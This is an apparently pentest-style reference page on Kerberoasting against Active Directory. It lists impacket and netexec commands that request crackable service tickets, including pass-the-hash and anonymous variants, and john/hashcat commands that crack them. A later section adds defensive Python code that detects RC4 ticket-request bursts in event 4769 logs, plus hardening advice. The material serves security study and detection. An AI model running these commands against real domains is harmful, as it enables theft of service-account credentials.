Kerberoasting Attack

Last modified: 2023-12-14

Active Directory Windows

Kerberoasting is an attack technique against Kerberos that recovers service account passwords by cracking them offline, starting from a credential that has already been gathered.

If we have the password hash of one user, we may be able to obtain another user's credential with it.

impacket-GetUserSPNs -hashes <lmhash>:<nthash> example.local/username -outputfile hashes.txt
# Without pre-authentication (-no-preauth):
impacket-GetUserSPNs -no-preauth username -usersfile users.txt -dc-host <ip-or-host> example.local/

netexec ldap <target-ip> -u username -p password --kerberoasting output.txt
netexec ldap <target-ip> -u '' -p '' --kerberoasting output.txt

After obtaining the hashes, we can crack them or use them for a pass-the-hash attack.
To crack them, run one of the following commands:

john --format=krb5tgs --wordlist=wordlist.txt hash.txt
# or
hashcat -m 13100 -a 0 hash.txt wordlist.txt
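On the defender's side, the ticket requests issued by the tools above appear on the domain controller as Windows Security event 4769 (Kerberos service ticket requested); one account requesting RC4 (etype 0x17) tickets for several user SPNs in a short burst is the classic signature. The following is an added example, not part of the original page or of any of the tools it lists: it takes 4769 records as dicts with the event's own field names, and the sample events, window and threshold are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype 23; AES tickets are 0x11/0x12 and are far costlier to crack

def is_roastable_request(ev):
    """True for a successful 4769 requesting an RC4 ticket for a user SPN
    (machine accounts end in '$' and krbtgt tickets are TGTs, so both are excluded)."""
    if ev["EventID"] != 4769 or ev["Status"] != "0x0":
        return False
    svc = ev["ServiceName"].lower()
    if svc.endswith("$") or svc.startswith("krbtgt"):
        return False
    return int(ev["TicketEncryptionType"], 16) == RC4_HMAC

def detect_kerberoasting(events, window=timedelta(minutes=5), min_services=3):
    """Alert when one account requests RC4 tickets for >= min_services distinct
    SPNs inside the window; the enumeration tools above do exactly that in one pass."""
    by_user = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            by_user[ev["TargetUserName"].lower()].append(ev)
    alerts = []
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["Time"])
        for i, first in enumerate(evs):
            burst = [e for e in evs[i:] if e["Time"] - first["Time"] <= window]
            services = sorted({e["ServiceName"].lower() for e in burst})
            if len(services) >= min_services:
                alerts.append({"user": user, "source": first["IpAddress"],
                               "services": services})
                break  # one alert per account is enough for triage
    return alerts

# Constructed sample 4769 events (assumed field names, not real log data).
T0 = datetime(2023, 12, 14, 9, 0, 0)
def ev(user, svc, etype, minute, ip="10.0.0.25"):
    return {"EventID": 4769, "Status": "0x0", "TargetUserName": user,
            "ServiceName": svc, "TicketEncryptionType": etype,
            "IpAddress": ip, "Time": T0 + timedelta(minutes=minute)}

SAMPLE_EVENTS = [
    ev("alice@EXAMPLE.LOCAL", "svc_sql", "0x17", 0),
    ev("alice@EXAMPLE.LOCAL", "svc_web", "0x17", 1),
    ev("alice@EXAMPLE.LOCAL", "svc_backup", "0x17", 1),
    ev("alice@EXAMPLE.LOCAL", "FILESRV01$", "0x17", 1),            # machine SPN, ignored
    ev("bob@EXAMPLE.LOCAL", "svc_sql", "0x12", 2, "10.0.0.31"),    # AES ticket, normal
    ev("carol@EXAMPLE.LOCAL", "svc_web", "0x17", 3, "10.0.0.40"),  # single legacy RC4 request
]

if __name__ == "__main__":
    for a in detect_kerberoasting(SAMPLE_EVENTS):
        print(f"{a['user']} from {a['source']} requested RC4 tickets for {a['services']}")
```

Tune the window and threshold to the environment; legacy applications that still negotiate RC4 for a single SPN (like carol above) should not trip the burst rule, and enabling AES-only on service accounts removes the cheap RC4 path entirely.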